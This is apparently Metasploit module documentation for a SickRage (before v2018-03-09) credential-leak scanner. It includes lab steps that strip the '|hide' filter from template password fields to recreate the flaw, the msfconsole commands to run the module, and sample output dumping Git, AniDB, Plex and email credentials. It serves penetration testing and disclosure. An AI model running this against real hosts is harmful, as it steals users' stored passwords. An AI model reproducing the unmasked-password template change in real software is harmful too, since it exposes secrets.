This module exploits a vulnerability in SickRage for versions under v2018-03-09. A simple GET request will return clear-text credentials for Github, Kodi, Plex, AniDB, etc. This exploit will only work if the user has not set credentials for the SickRage application. By default, SickRage credentials are not set.
SickRage < v2018-03-09
The vulnerable versions of SickRage are no longer accessible, but the latest release can be made vulnerable with a few changes. The latest SickRage release for Windows can be found here.
- Install the application
- Navigate to
C:\SickRage\SickRage\gui\slick\views
- Open
config_general.mako
- Find the input element with the name
git_password
- Change the value from
${sickbeard.GIT_PASSWORD|hide}
to${sickbeard.GIT_PASSWORD}
- Save the changes
- Open
config_anime.mako
- Find the input element with the name
anidb_password
- Change the value from
${sickbeard.ANIDB_PASSWORD|hide}
to${sickbeard.ANIDB_PASSWORD}
- Save the changes
- Open
config_notifications.mako
- Find the input element with the name
kodi_password
- Change the value from
${sickbeard.KODI_PASSWORD|hide}
to${sickbeard.KODI_PASSWORD}
- Find the input element with the name
plex_server_password
- Change the value from
${sickbeard.PLEX_SERVER_PASSWORD|hide}
to${sickbeard.PLEX_SERVER_PASSWORD}
- Find the input element with the name
plex_client_password
- Change the value from
${sickbeard.PLEX_CLIENT_PASSWORD|hide}
to${sickbeard.PLEX_CLIENT_PASSWORD}
- Find the input element with the name
email_password
- Change the value from
${sickbeard.EMAIL_PASSWORD|hide}
to${sickbeard.EMAIL_PASSWORD}
- Save the changes
- Start SickRage
- Start msfconsole
- Do:
use [auxiliary/scanner/http/http_sickrage_password_leak]
- Do:
set RHOSTS [IP]
- Do:
run
- The credentials that the user has set should be printed to the screen
msf5 > use auxiliary/scanner/http/http_sickrage_password_leak
msf5 auxiliary(scanner/http/http_sickrage_password_leak) > set RHOSTS 192.168.37.130
RHOSTS => 192.168.37.130
msf5 auxiliary(scanner/http/http_sickrage_password_leak) > run
[+] git username: myUsername
[+] git password: myPassword
[+] anidb username: anidb
[+] anidb password: anidbpass
[+] plex_server username: plexu
[+] plex_server password: plexp
[+] plex_client username: plextu
[+] plex_client password: plextp
[+] Email username: sickrage@sickrage.com
[+] Email password: sickragepass
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/http_sickrage_password_leak) >